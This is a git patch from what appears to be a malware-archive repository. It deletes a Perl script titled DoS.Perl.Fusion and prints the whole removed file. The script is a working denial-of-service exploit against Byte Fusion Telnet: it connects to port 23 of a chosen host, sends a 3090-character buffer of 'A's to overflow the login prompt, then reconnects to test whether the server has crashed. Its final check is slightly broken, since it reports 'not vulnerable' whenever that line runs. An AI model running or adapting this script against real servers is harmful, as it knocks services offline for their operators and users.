From 34107bda925ad9699395e880f43066a759468d8c Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Sat, 14 Nov 2020 01:19:03 -0600 Subject: [PATCH] Delete DoS.Perl.Fusion na --- Perl/DoS.Perl.Fusion | 43 ------------------------------------------- 1 file changed, 43 deletions(-) delete mode 100644 Perl/DoS.Perl.Fusion diff --git a/Perl/DoS.Perl.Fusion b/Perl/DoS.Perl.Fusion deleted file mode 100644 index 7f302d9f..00000000 --- a/Perl/DoS.Perl.Fusion +++ /dev/null @@ -1,43 +0,0 @@ - -# Example for a possible DOS-attack against Byte Fusion Telnet. -# There need to be 3090 characters to overflow Server. -# Example : Trying example.com... -# Connected to example.com. -# Escape character is '^]'. -# Byte Fusion Telnet, Copyright 1999 Byte Fusion Corporation -# Unregistered Evaluation. See www.bytefusion.com/telnet.html -# (Machine name) Login: [more then 3090 characters] -# Overflow - -use IO::Socket; - -print "Possible DOS-attack against Byte Fusion Telnet\n"; -print "++++++++++++++++++++++++++++++++++++++++++++++\n"; - -if (not $ARGV[0]) { - print "Usage: $0 [host]\n\n"; - exit(0); -} - -sub connecthost { - $host = IO::Socket::INET->new ( Proto => "tcp", - PeerAddr => $ARGV[0], - PeerPort => "23",) or die "Can't open connection to $ARGV[0] because $!\n"; - $host->autoflush(1); -} - -$bufferoverflow .= "A" x 3090; - -print "\nOpen connection...\n"; -&connecthost; -print "Sending characters...\n"; -print $host "$bufferoverflow\n"; -print "close connection...\n"; -close $host; - -print "\nTesting...\n"; -&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n"); -close $host; -die "The host $ARGV[0] is not vulnerable to this attack.\n"; - -# by arbon(arbon@gmx.de) \ No newline at end of file